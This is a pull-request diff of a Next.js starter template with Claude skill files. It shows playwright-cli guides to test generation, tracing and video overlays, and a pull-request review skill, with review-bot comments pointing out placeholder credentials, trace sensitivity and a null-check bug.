- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.claude/skills/video-downloader/SKILL.md +42 -0
- package/template/.claude/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/skills/webgpu-threejs-tsl/REFERENCE.md +371 -0
- package/template/.claude/skills/webgpu-threejs-tsl/SKILL.md +93 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/compute-shaders.md +578 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/core-concepts.md +497 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/device-loss.md +359 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/limits-and-features.md +133 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/materials.md +353 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/post-processing.md +515 -0
- package/template/.claude/skills/webgpu-threejs-tsl/docs/wgsl-integration.md +324 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/basic-setup.js +87 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/custom-material.js +170 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/earth-shader.js +292 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/particle-system.js +259 -0
- package/template/.claude/skills/webgpu-threejs-tsl/examples/post-processing.js +199 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/compute-shader.js +343 -0
- package/template/.claude/skills/webgpu-threejs-tsl/templates/webgpu-project.js +276 -0
- package/template/.claude/skills/zoom-out/SKILL.md +7 -0
- package/template/.mcp.json +5 -0
- package/template/.nvmrc +1 -0
- package/template/.prettierignore +25 -0
- package/template/.prettierrc +11 -0
- package/template/.vscode/settings.json +1 -0
- package/template/.vscode/tasks.json.example +85 -0
- package/template/AGENTS.md +37 -0
- package/template/CLAUDE.md +75 -0
- package/template/CONTEXT.md +29 -0
- package/template/DESIGN.md +451 -0
- package/template/README.md +394 -0
- package/template/_gitignore +48 -0
- package/template/components.json +21 -0
- package/template/docker-compose.yml +9 -0
- package/template/docs/business/starter-prompt.md +94 -0
- package/template/docs/technical/ai/streaming.md +520 -0
- package/template/docs/technical/ai/structured-data.md +409 -0
- package/template/docs/technical/betterauth/polar.md +476 -0
- package/template/docs/technical/react-markdown.md +123 -0
- package/template/drizzle/0000_chilly_the_phantom.sql +50 -0
- package/template/drizzle/0001_last_warpath.sql +5 -0
- package/template/drizzle/meta/0000_snapshot.json +326 -0
- package/template/drizzle/meta/0001_snapshot.json +410 -0
- package/template/drizzle/meta/_journal.json +20 -0
- package/template/drizzle.config.ts +10 -0
- package/template/env.example +26 -0
- package/template/eslint.config.mjs +75 -0
- package/template/next-env.d.ts +6 -0
- package/template/next.config.ts +57 -0
- package/template/package.json +79 -0
- package/template/postcss.config.mjs +5 -0
- package/template/public/file.svg +1 -0
- package/template/public/globe.svg +1 -0
- package/template/public/next.svg +1 -0
- package/template/public/vercel.svg +1 -0
- package/template/public/window.svg +1 -0
- package/template/scripts/setup.ts +277 -0
- package/template/skills-lock.json +61 -0
- package/template/specs/ui-polish-responsive/README.md +59 -0
- package/template/specs/ui-polish-responsive/action-required.md +3 -0
- package/template/specs/ui-polish-responsive/requirements.md +53 -0
- package/template/specs/ui-polish-responsive/tasks/task-01-globals-css.md +144 -0
- package/template/specs/ui-polish-responsive/tasks/task-02-layout.md +66 -0
- package/template/specs/ui-polish-responsive/tasks/task-03-site-header.md +79 -0
- package/template/specs/ui-polish-responsive/tasks/task-04-site-footer.md +63 -0
- package/template/specs/ui-polish-responsive/tasks/task-05-home-page.md +215 -0
- package/template/specs/ui-polish-responsive/tasks/task-06-dashboard.md +222 -0
- package/template/specs/ui-polish-responsive/tasks/task-07-chat-page.md +225 -0
- package/template/specs/ui-polish-responsive/tasks/task-08-profile-page.md +192 -0
- package/template/specs/ui-polish-responsive/tasks/task-09-auth-pages.md +97 -0
- package/template/specs/ui-polish-responsive/tasks/task-10-setup-checklist.md +120 -0
- package/template/specs/ui-polish-responsive/tasks/task-11-starter-prompt-modal.md +87 -0
- package/template/src/app/(auth)/forgot-password/page.tsx +35 -0
- package/template/src/app/(auth)/layout.tsx +7 -0
- package/template/src/app/(auth)/login/page.tsx +44 -0
- package/template/src/app/(auth)/register/page.tsx +33 -0
- package/template/src/app/(auth)/reset-password/page.tsx +36 -0
- package/template/src/app/api/auth/[...all]/route.ts +4 -0
- package/template/src/app/api/chat/route.ts +80 -0
- package/template/src/app/api/diagnostics/route.ts +162 -0
- package/template/src/app/chat/error.tsx +46 -0
- package/template/src/app/chat/loading.tsx +42 -0
- package/template/src/app/chat/page.tsx +348 -0
- package/template/src/app/dashboard/loading.tsx +63 -0
- package/template/src/app/dashboard/page.tsx +79 -0
- package/template/src/app/error.tsx +44 -0
- package/template/src/app/favicon.ico +0 -0
- package/template/src/app/globals.css +175 -0
- package/template/src/app/layout.tsx +108 -0
- package/template/src/app/manifest.ts +21 -0
- package/template/src/app/not-found.tsx +28 -0
- package/template/src/app/page.tsx +152 -0
- package/template/src/app/profile/page.tsx +416 -0
- package/template/src/app/robots.ts +16 -0
- package/template/src/app/sitemap.ts +26 -0
- package/template/src/components/auth/forgot-password-form.tsx +83 -0
- package/template/src/components/auth/reset-password-form.tsx +107 -0
- package/template/src/components/auth/sign-in-button.tsx +97 -0
- package/template/src/components/auth/sign-out-button.tsx +31 -0
- package/template/src/components/auth/sign-up-form.tsx +121 -0
- package/template/src/components/auth/user-profile.tsx +91 -0
- package/template/src/components/setup-checklist.tsx +180 -0
- package/template/src/components/site-footer.tsx +24 -0
- package/template/src/components/site-header.tsx +46 -0
- package/template/src/components/starter-prompt-modal.tsx +202 -0
- package/template/src/components/theme-provider.tsx +11 -0
- package/template/src/components/ui/avatar.tsx +52 -0
- package/template/src/components/ui/badge.tsx +35 -0
- package/template/src/components/ui/button.tsx +58 -0
- package/template/src/components/ui/card.tsx +78 -0
- package/template/src/components/ui/dialog.tsx +142 -0
- package/template/src/components/ui/dropdown-menu.tsx +256 -0
- package/template/src/components/ui/github-stars.tsx +53 -0
- package/template/src/components/ui/input.tsx +20 -0
- package/template/src/components/ui/label.tsx +23 -0
- package/template/src/components/ui/mode-toggle.tsx +38 -0
- package/template/src/components/ui/separator.tsx +23 -0
- package/template/src/components/ui/skeleton.tsx +13 -0
- package/template/src/components/ui/sonner.tsx +42 -0
- package/template/src/components/ui/spinner.tsx +21 -0
- package/template/src/components/ui/textarea.tsx +17 -0
- package/template/src/hooks/use-diagnostics.ts +86 -0
- package/template/src/lib/auth-client.ts +16 -0
- package/template/src/lib/auth.ts +25 -0
- package/template/src/lib/db.ts +12 -0
- package/template/src/lib/env.ts +117 -0
- package/template/src/lib/schema.ts +82 -0
- package/template/src/lib/session.ts +48 -0
- package/template/src/lib/storage.ts +225 -0
- package/template/src/lib/utils.ts +6 -0
- package/template/src/proxy.ts +25 -0
- package/template/tsconfig.json +48 -0
|
@@ -0,0 +1,88 @@
|
|
|
1
|
+
# Test Generation
|
|
2
|
+
|
|
3
|
+
Generate Playwright test code automatically as you interact with the browser.
|
|
4
|
+
|
|
5
|
+
## How It Works
|
|
6
|
+
|
|
7
|
+
Every action you perform with `playwright-cli` generates corresponding Playwright TypeScript code.
|
|
8
|
+
This code appears in the output and can be copied directly into your test files.
|
|
9
|
+
|
|
10
|
+
## Example Workflow
|
|
11
|
+
|
|
12
|
+
```bash
|
|
13
|
+
# Start a session
|
|
14
|
+
playwright-cli open https://example.com/login
|
|
15
|
+
|
|
16
|
+
# Take a snapshot to see elements
|
|
17
|
+
playwright-cli snapshot
|
|
18
|
+
# Output shows: e1 [textbox "Email"], e2 [textbox "Password"], e3 [button "Sign In"]
|
|
19
|
+
|
|
20
|
+
# Fill form fields - generates code automatically
|
|
21
|
+
playwright-cli fill e1 "user@example.com"
|
|
22
|
+
# Ran Playwright code:
|
|
23
|
+
# await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
|
|
24
|
+
|
|
25
|
+
playwright-cli fill e2 "password123"
|
|
26
|
+
# Ran Playwright code:
|
|
27
|
+
# await page.getByRole('textbox', { name: 'Password' }).fill('password123');
|
|
28
|
+
|
|
29
|
+
playwright-cli click e3
|
|
30
|
+
# Ran Playwright code:
|
|
31
|
+
# await page.getByRole('button', { name: 'Sign In' }).click();
|
|
32
|
+
```
|
|
33
|
+
|
|
34
|
+
## Building a Test File
|
|
35
|
+
|
|
36
|
+
Collect the generated code into a Playwright test:
|
|
37
|
+
|
|
38
|
+
```typescript
|
|
39
|
+
import { test, expect } from '@playwright/test';
|
|
40
|
+
|
|
41
|
+
test('login flow', async ({ page }) => {
|
|
42
|
+
// Generated code from playwright-cli session:
|
|
43
|
+
await page.goto('https://example.com/login');
|
|
44
|
+
await page.getByRole('textbox', { name: 'Email' }).fill('user@example.com');
|
|
45
|
+
await page.getByRole('textbox', { name: 'Password' }).fill('password123');
|
|
46
|
+
await page.getByRole('button', { name: 'Sign In' }).click();
|
|
47
|
+
|
|
48
|
+
// Add assertions
|
|
49
|
+
await expect(page).toHaveURL(/.*dashboard/);
|
|
50
|
+
});
|
|
51
|
+
```
|
|
52
|
+
|
|
53
|
+
## Best Practices
|
|
54
|
+
|
|
55
|
+
### 1. Use Semantic Locators
|
|
56
|
+
|
|
57
|
+
The generated code uses role-based locators when possible, which are more resilient:
|
|
58
|
+
|
|
59
|
+
```typescript
|
|
60
|
+
// Generated (good - semantic)
|
|
61
|
+
await page.getByRole('button', { name: 'Submit' }).click();
|
|
62
|
+
|
|
63
|
+
// Avoid (fragile - CSS selectors)
|
|
64
|
+
await page.locator('#submit-btn').click();
|
|
65
|
+
```
|
|
66
|
+
|
|
67
|
+
### 2. Explore Before Recording
|
|
68
|
+
|
|
69
|
+
Take snapshots to understand the page structure before recording actions:
|
|
70
|
+
|
|
71
|
+
```bash
|
|
72
|
+
playwright-cli open https://example.com
|
|
73
|
+
playwright-cli snapshot
|
|
74
|
+
# Review the element structure
|
|
75
|
+
playwright-cli click e5
|
|
76
|
+
```
|
|
77
|
+
|
|
78
|
+
### 3. Add Assertions Manually
|
|
79
|
+
|
|
80
|
+
Generated code captures actions but not assertions. Add expectations in your test:
|
|
81
|
+
|
|
82
|
+
```typescript
|
|
83
|
+
// Generated action
|
|
84
|
+
await page.getByRole('button', { name: 'Submit' }).click();
|
|
85
|
+
|
|
86
|
+
// Manual assertion
|
|
87
|
+
await expect(page.getByText('Success')).toBeVisible();
|
|
88
|
+
```
|
|
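Review bot: The Example Workflow keeps a literal password in the recorded output: `playwright-cli fill e2 "password123"` is echoed back under "Ran Playwright code", and Building a Test File copies that line into the `login flow` test unchanged. Because the text says the output "can be copied directly into your test files", add a best practice telling readers to replace recorded credentials with values read from the environment or a secrets store before committing the test, and to expect the typed value to appear in the CLI output as well.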
@@ -0,0 +1,139 @@
|
|
|
1
|
+
# Tracing
|
|
2
|
+
|
|
3
|
+
Capture detailed execution traces for debugging and analysis. Traces include DOM snapshots, screenshots, network activity, and console logs.
|
|
4
|
+
|
|
5
|
+
## Basic Usage
|
|
6
|
+
|
|
7
|
+
```bash
|
|
8
|
+
# Start trace recording
|
|
9
|
+
playwright-cli tracing-start
|
|
10
|
+
|
|
11
|
+
# Perform actions
|
|
12
|
+
playwright-cli open https://example.com
|
|
13
|
+
playwright-cli click e1
|
|
14
|
+
playwright-cli fill e2 "test"
|
|
15
|
+
|
|
16
|
+
# Stop trace recording
|
|
17
|
+
playwright-cli tracing-stop
|
|
18
|
+
```
|
|
19
|
+
|
|
20
|
+
## Trace Output Files
|
|
21
|
+
|
|
22
|
+
When you start tracing, Playwright creates a `traces/` directory with several files:
|
|
23
|
+
|
|
24
|
+
### `trace-{timestamp}.trace`
|
|
25
|
+
|
|
26
|
+
**Action log** - The main trace file containing:
|
|
27
|
+
- Every action performed (clicks, fills, navigations)
|
|
28
|
+
- DOM snapshots before and after each action
|
|
29
|
+
- Screenshots at each step
|
|
30
|
+
- Timing information
|
|
31
|
+
- Console messages
|
|
32
|
+
- Source locations
|
|
33
|
+
|
|
34
|
+
### `trace-{timestamp}.network`
|
|
35
|
+
|
|
36
|
+
**Network log** - Complete network activity:
|
|
37
|
+
- All HTTP requests and responses
|
|
38
|
+
- Request headers and bodies
|
|
39
|
+
- Response headers and bodies
|
|
40
|
+
- Timing (DNS, connect, TLS, TTFB, download)
|
|
41
|
+
- Resource sizes
|
|
42
|
+
- Failed requests and errors
|
|
43
|
+
|
|
44
|
+
### `resources/`
|
|
45
|
+
|
|
46
|
+
**Resources directory** - Cached resources:
|
|
47
|
+
- Images, fonts, stylesheets, scripts
|
|
48
|
+
- Response bodies for replay
|
|
49
|
+
- Assets needed to reconstruct page state
|
|
50
|
+
|
|
51
|
+
## What Traces Capture
|
|
52
|
+
|
|
53
|
+
| Category | Details |
|
|
54
|
+
|----------|---------|
|
|
55
|
+
| **Actions** | Clicks, fills, hovers, keyboard input, navigations |
|
|
56
|
+
| **DOM** | Full DOM snapshot before/after each action |
|
|
57
|
+
| **Screenshots** | Visual state at each step |
|
|
58
|
+
| **Network** | All requests, responses, headers, bodies, timing |
|
|
59
|
+
| **Console** | All console.log, warn, error messages |
|
|
60
|
+
| **Timing** | Precise timing for each operation |
|
|
61
|
+
|
|
62
|
+
## Use Cases
|
|
63
|
+
|
|
64
|
+
### Debugging Failed Actions
|
|
65
|
+
|
|
66
|
+
```bash
|
|
67
|
+
playwright-cli tracing-start
|
|
68
|
+
playwright-cli open https://app.example.com
|
|
69
|
+
|
|
70
|
+
# This click fails - why?
|
|
71
|
+
playwright-cli click e5
|
|
72
|
+
|
|
73
|
+
playwright-cli tracing-stop
|
|
74
|
+
# Open trace to see DOM state when click was attempted
|
|
75
|
+
```
|
|
76
|
+
|
|
77
|
+
### Analyzing Performance
|
|
78
|
+
|
|
79
|
+
```bash
|
|
80
|
+
playwright-cli tracing-start
|
|
81
|
+
playwright-cli open https://slow-site.com
|
|
82
|
+
playwright-cli tracing-stop
|
|
83
|
+
|
|
84
|
+
# View network waterfall to identify slow resources
|
|
85
|
+
```
|
|
86
|
+
|
|
87
|
+
### Capturing Evidence
|
|
88
|
+
|
|
89
|
+
```bash
|
|
90
|
+
# Record a complete user flow for documentation
|
|
91
|
+
playwright-cli tracing-start
|
|
92
|
+
|
|
93
|
+
playwright-cli open https://app.example.com/checkout
|
|
94
|
+
playwright-cli fill e1 "4111111111111111"
|
|
95
|
+
playwright-cli fill e2 "12/25"
|
|
96
|
+
playwright-cli fill e3 "123"
|
|
97
|
+
playwright-cli click e4
|
|
98
|
+
|
|
99
|
+
playwright-cli tracing-stop
|
|
100
|
+
# Trace shows exact sequence of events
|
|
101
|
+
```
|
|
102
|
+
|
|
103
|
+
## Trace vs Video vs Screenshot
|
|
104
|
+
|
|
105
|
+
| Feature | Trace | Video | Screenshot |
|
|
106
|
+
|---------|-------|-------|------------|
|
|
107
|
+
| **Format** | .trace file | .webm video | .png/.jpeg image |
|
|
108
|
+
| **DOM inspection** | Yes | No | No |
|
|
109
|
+
| **Network details** | Yes | No | No |
|
|
110
|
+
| **Step-by-step replay** | Yes | Continuous | Single frame |
|
|
111
|
+
| **File size** | Medium | Large | Small |
|
|
112
|
+
| **Best for** | Debugging | Demos | Quick capture |
|
|
113
|
+
|
|
114
|
+
## Best Practices
|
|
115
|
+
|
|
116
|
+
### 1. Start Tracing Before the Problem
|
|
117
|
+
|
|
118
|
+
```bash
|
|
119
|
+
# Trace the entire flow, not just the failing step
|
|
120
|
+
playwright-cli tracing-start
|
|
121
|
+
playwright-cli open https://example.com
|
|
122
|
+
# ... all steps leading to the issue ...
|
|
123
|
+
playwright-cli tracing-stop
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
### 2. Clean Up Old Traces
|
|
127
|
+
|
|
128
|
+
Traces can consume significant disk space:
|
|
129
|
+
|
|
130
|
+
```bash
|
|
131
|
+
# Remove traces older than 7 days
|
|
132
|
+
find .playwright-cli/traces -mtime +7 -delete
|
|
133
|
+
```
|
|
134
|
+
|
|
135
|
+
## Limitations
|
|
136
|
+
|
|
137
|
+
- Traces add overhead to automation
|
|
138
|
+
- Large traces can consume significant disk space
|
|
139
|
+
- Some dynamic content may not replay perfectly
|
|
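Review bot: The Capturing Evidence example types a card number, expiry and security code (`fill e1 "4111111111111111"`, `fill e2 "12/25"`, `fill e3 "123"`) while tracing, and Trace Output Files states that the trace stores request and response headers and bodies, DOM snapshots and screenshots, yet nothing in the document says traces must be handled as sensitive. Add a note that a trace can hold credentials, cookies and form input, so it should be recorded against test data only and kept out of version control and shared storage. Separately, the cleanup command targets `.playwright-cli/traces` while the text says Playwright creates a `traces/` directory; state one path, and consider adding `-type f` so that `find ... -delete` only matches files.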
@@ -0,0 +1,143 @@
|
|
|
1
|
+
# Video Recording
|
|
2
|
+
|
|
3
|
+
Capture browser automation sessions as video for debugging, documentation, or verification. Produces WebM (VP8/VP9 codec).
|
|
4
|
+
|
|
5
|
+
## Basic Recording
|
|
6
|
+
|
|
7
|
+
```bash
|
|
8
|
+
# Open browser first
|
|
9
|
+
playwright-cli open
|
|
10
|
+
|
|
11
|
+
# Start recording
|
|
12
|
+
playwright-cli video-start demo.webm
|
|
13
|
+
|
|
14
|
+
# Add a chapter marker for section transitions
|
|
15
|
+
playwright-cli video-chapter "Getting Started" --description="Opening the homepage" --duration=2000
|
|
16
|
+
|
|
17
|
+
# Navigate and perform actions
|
|
18
|
+
playwright-cli goto https://example.com
|
|
19
|
+
playwright-cli snapshot
|
|
20
|
+
playwright-cli click e1
|
|
21
|
+
|
|
22
|
+
# Add another chapter
|
|
23
|
+
playwright-cli video-chapter "Filling Form" --description="Entering test data" --duration=2000
|
|
24
|
+
playwright-cli fill e2 "test input"
|
|
25
|
+
|
|
26
|
+
# Stop and save
|
|
27
|
+
playwright-cli video-stop
|
|
28
|
+
```
|
|
29
|
+
|
|
30
|
+
## Best Practices
|
|
31
|
+
|
|
32
|
+
### 1. Use Descriptive Filenames
|
|
33
|
+
|
|
34
|
+
```bash
|
|
35
|
+
# Include context in filename
|
|
36
|
+
playwright-cli video-start recordings/login-flow-2024-01-15.webm
|
|
37
|
+
playwright-cli video-start recordings/checkout-test-run-42.webm
|
|
38
|
+
```
|
|
39
|
+
|
|
40
|
+
### 2. Record entire hero scripts.
|
|
41
|
+
|
|
42
|
+
When recording a video for the user or as a proof of work, it is best to create a code snippet and execute it with run-code.
|
|
43
|
+
It allows pulling appropriate pauses between the actions and annotating the video. There are new Playwright APIs for that.
|
|
44
|
+
|
|
45
|
+
1) Perform scenario using CLI and take note of all locators and actions. You'll need those locators to request thier bounding boxes for highlight.
|
|
46
|
+
2) Create a file with the intended script for video (below). Use pressSequentially w/ delay for nice typing, make reasonable pauses.
|
|
47
|
+
3) Use playwright-cli run-code --file your-script.js
|
|
48
|
+
|
|
49
|
+
**Important**: Overlays are `pointer-events: none` — they do not interfere with page interactions. You can safely keep sticky overlays visible while clicking, filling, or performing any actions on the page.
|
|
50
|
+
|
|
51
|
+
```js
|
|
52
|
+
async page => {
|
|
53
|
+
await page.screencast.start({ path: 'video.webm', size: { width: 1280, height: 800 } });
|
|
54
|
+
await page.goto('https://demo.playwright.dev/todomvc');
|
|
55
|
+
|
|
56
|
+
// Show a chapter card — blurs the page and shows a dialog.
|
|
57
|
+
// Blocks until duration expires, then auto-removes.
|
|
58
|
+
// Use this for simple use cases, but always feel free to hand-craft your own beautiful
|
|
59
|
+
// overlay via await page.screencast.showOverlay().
|
|
60
|
+
await page.screencast.showChapter('Adding Todo Items', {
|
|
61
|
+
description: 'We will add several items to the todo list.',
|
|
62
|
+
duration: 2000,
|
|
63
|
+
});
|
|
64
|
+
|
|
65
|
+
// Perform action
|
|
66
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Walk the dog', { delay: 60 });
|
|
67
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
|
|
68
|
+
await page.waitForTimeout(1000);
|
|
69
|
+
|
|
70
|
+
// Show next chapter
|
|
71
|
+
await page.screencast.showChapter('Verifying Results', {
|
|
72
|
+
description: 'Checking the item appeared in the list.',
|
|
73
|
+
duration: 2000,
|
|
74
|
+
});
|
|
75
|
+
|
|
76
|
+
// Add a sticky annotation that stays while you perform actions.
|
|
77
|
+
// Overlays are pointer-events: none, so they won't block clicks.
|
|
78
|
+
const annotation = await page.screencast.showOverlay(`
|
|
79
|
+
<div style="position: absolute; top: 8px; right: 8px;
|
|
80
|
+
padding: 6px 12px; background: rgba(0,0,0,0.7);
|
|
81
|
+
border-radius: 8px; font-size: 13px; color: white;">
|
|
82
|
+
✓ Item added successfully
|
|
83
|
+
</div>
|
|
84
|
+
`);
|
|
85
|
+
|
|
86
|
+
// Perform more actions while the annotation is visible
|
|
87
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Buy groceries', { delay: 60 });
|
|
88
|
+
await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
|
|
89
|
+
await page.waitForTimeout(1500);
|
|
90
|
+
|
|
91
|
+
// Remove the annotation when done
|
|
92
|
+
await annotation.dispose();
|
|
93
|
+
|
|
94
|
+
// You can also highlight relevant locators and provide contextual annotations.
|
|
95
|
+
const bounds = await page.getByText('Walk the dog').boundingBox();
|
|
96
|
+
await page.screencast.showOverlay(`
|
|
97
|
+
<div style="position: absolute;
|
|
98
|
+
top: ${bounds.y}px;
|
|
99
|
+
left: ${bounds.x}px;
|
|
100
|
+
width: ${bounds.width}px;
|
|
101
|
+
height: ${bounds.height}px;
|
|
102
|
+
border: 1px solid red;">
|
|
103
|
+
</div>
|
|
104
|
+
<div style="position: absolute;
|
|
105
|
+
top: ${bounds.y + bounds.height + 5}px;
|
|
106
|
+
left: ${bounds.x + bounds.width / 2}px;
|
|
107
|
+
transform: translateX(-50%);
|
|
108
|
+
padding: 6px;
|
|
109
|
+
background: #808080;
|
|
110
|
+
border-radius: 10px;
|
|
111
|
+
font-size: 14px;
|
|
112
|
+
color: white;">Check it out, it is right above this text
|
|
113
|
+
</div>
|
|
114
|
+
`, { duration: 2000 });
|
|
115
|
+
|
|
116
|
+
await page.screencast.stop();
|
|
117
|
+
}
|
|
118
|
+
```
|
|
119
|
+
|
|
120
|
+
Embrace creativity, overlays are powerful.
|
|
121
|
+
|
|
122
|
+
### Overlay API Summary
|
|
123
|
+
|
|
124
|
+
| Method | Use Case |
|
|
125
|
+
|--------|----------|
|
|
126
|
+
| `page.screencast.showChapter(title, { description?, duration?, styleSheet? })` | Full-screen chapter card with blurred backdrop — ideal for section transitions |
|
|
127
|
+
| `page.screencast.showOverlay(html, { duration? })` | Custom HTML overlay — use for callouts, labels, highlights |
|
|
128
|
+
| `disposable.dispose()` | Remove a sticky overlay added without duration |
|
|
129
|
+
| `page.screencast.hideOverlays()` / `page.screencast.showOverlays()` | Temporarily hide/show all overlays |
|
|
130
|
+
|
|
131
|
+
## Tracing vs Video
|
|
132
|
+
|
|
133
|
+
| Feature | Video | Tracing |
|
|
134
|
+
|---------|-------|---------|
|
|
135
|
+
| Output | WebM file | Trace file (viewable in Trace Viewer) |
|
|
136
|
+
| Shows | Visual recording | DOM snapshots, network, console, actions |
|
|
137
|
+
| Use case | Demos, documentation | Debugging, analysis |
|
|
138
|
+
| Size | Larger | Smaller |
|
|
139
|
+
|
|
140
|
+
## Limitations
|
|
141
|
+
|
|
142
|
+
- Recording adds slight overhead to automation
|
|
143
|
+
- Large recordings can consume significant disk space
|
|
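Review bot: In the highlight step of the hero script, `const bounds = await page.getByText('Walk the dog').boundingBox();` is dereferenced straight away (`bounds.y`, `bounds.x`), but `boundingBox()` resolves to null when the element is not visible, so the script would throw mid-recording and never reach `page.screencast.stop()`. Check for null before building the overlay and move the stop call into a `finally` block. Since `showOverlay` takes an HTML string built with template interpolation, it is also worth saying that only numbers or escaped text should be interpolated, never strings read from the page. Step 1 has a typo: "thier".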
@@ -0,0 +1,97 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: review-pr
|
|
3
|
+
description: >
|
|
4
|
+
Review pull requests with complexity-adaptive depth — spawning deep-dive agents for medium
|
|
5
|
+
and complex PRs. Use this skill when the user says "review this PR", "review PR #123",
|
|
6
|
+
"check this pull request", "give me a code review", or wants feedback on a PR before merging.
|
|
7
|
+
Also use when the user says "/review-pr" or pastes a GitHub PR URL. Requires the GitHub CLI (gh).
|
|
8
|
+
---
|
|
9
|
+
|
|
10
|
+
# Review Pull Request
|
|
11
|
+
|
|
12
|
+
Review pull requests with a depth that matches their complexity. Simple PRs get a direct review; complex PRs get parallel deep-dive agents analyzing security, performance, and architecture.
|
|
13
|
+
|
|
14
|
+
## Arguments
|
|
15
|
+
|
|
16
|
+
The user should provide PR number(s) or URL(s). If none provided, ask for them.
|
|
17
|
+
|
|
18
|
+
## Instructions
|
|
19
|
+
|
|
20
|
+
### Step 1: Retrieve PR Details
|
|
21
|
+
|
|
22
|
+
Use the GitHub CLI to get the full picture:
|
|
23
|
+
|
|
24
|
+
```bash
|
|
25
|
+
gh pr view {pr_number} --json title,body,files,additions,deletions,commits,author,reviews,comments
|
|
26
|
+
gh pr diff {pr_number}
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
### Step 2: Assess Complexity
|
|
30
|
+
|
|
31
|
+
Score the PR based on:
|
|
32
|
+
- Number of files changed
|
|
33
|
+
- Lines added/removed
|
|
34
|
+
- Number of commits
|
|
35
|
+
- Whether changes touch core/architectural files
|
|
36
|
+
|
|
37
|
+
**Simple** (direct review, no agents):
|
|
38
|
+
- 5 or fewer files AND 100 or fewer lines AND single author
|
|
39
|
+
|
|
40
|
+
**Medium** (1-2 deep-dive agents):
|
|
41
|
+
- 6-15 files, OR 100-500 lines, OR 2 contributors
|
|
42
|
+
|
|
43
|
+
**Complex** (up to 3 deep-dive agents):
|
|
44
|
+
- More than 15 files, OR more than 500 lines, OR more than 2 contributors, OR touches core architecture
|
|
45
|
+
|
|
46
|
+
### Step 3: Analyze
|
|
47
|
+
|
|
48
|
+
**For Simple PRs**: review directly — read the diff, check for issues, provide feedback.
|
|
49
|
+
|
|
50
|
+
**For Medium/Complex PRs**: spawn deep-dive agents in parallel using the `Agent` tool with `subagent_type: "deep-dive"`. Each agent gets a focused area:
|
|
51
|
+
|
|
52
|
+
- **Agent 1 — Code Quality**: conventions, patterns, maintainability, test coverage
|
|
53
|
+
- **Agent 2 — Security**: input validation, auth checks, injection risks, data exposure
|
|
54
|
+
- **Agent 3 — Architecture** (Complex only): design patterns, separation of concerns, performance implications, backwards compatibility
|
|
55
|
+
|
|
56
|
+
Each agent receives the PR diff and description and returns a structured review.
|
|
57
|
+
|
|
58
|
+
### Step 4: Vision Alignment
|
|
59
|
+
|
|
60
|
+
Read the project's `README.md` and `CLAUDE.md` to understand the application's purpose. Assess whether the PR aligns with the project's intended direction. Flag significant deviations — not as a blocker, but as a consideration for the reviewer.
|
|
61
|
+
|
|
62
|
+
### Step 5: Safety Assessment
|
|
63
|
+
|
|
64
|
+
Provide an overall assessment:
|
|
65
|
+
- **Safe to merge**: no significant issues found
|
|
66
|
+
- **Merge with caution**: minor issues that should be noted but aren't blocking
|
|
67
|
+
- **Needs changes**: issues that should be fixed before merging
|
|
68
|
+
|
|
69
|
+
Include a risk level (low/medium/high) with justification.
|
|
70
|
+
|
|
71
|
+
### Step 6: Report
|
|
72
|
+
|
|
73
|
+
Structure the review as:
|
|
74
|
+
|
|
75
|
+
```
|
|
76
|
+
## PR Review: #{pr_number} — {title}
|
|
77
|
+
|
|
78
|
+
### Complexity: {Simple|Medium|Complex}
|
|
79
|
+
{Brief justification}
|
|
80
|
+
|
|
81
|
+
### Summary
|
|
82
|
+
{2-3 sentence overview of what the PR does}
|
|
83
|
+
|
|
84
|
+
### Issues Found
|
|
85
|
+
{Grouped by severity: high → medium → low}
|
|
86
|
+
- **{severity}**: {file:line} — {description}
|
|
87
|
+
|
|
88
|
+
### Improvements Suggested
|
|
89
|
+
{Optional improvements ranked by importance and implementation complexity}
|
|
90
|
+
|
|
91
|
+
### Vision Alignment
|
|
92
|
+
{Does this PR align with the project's direction?}
|
|
93
|
+
|
|
94
|
+
### Verdict: {Safe to merge | Merge with caution | Needs changes}
|
|
95
|
+
Risk level: {low|medium|high}
|
|
96
|
+
{Brief justification}
|
|
97
|
+
```
|
|
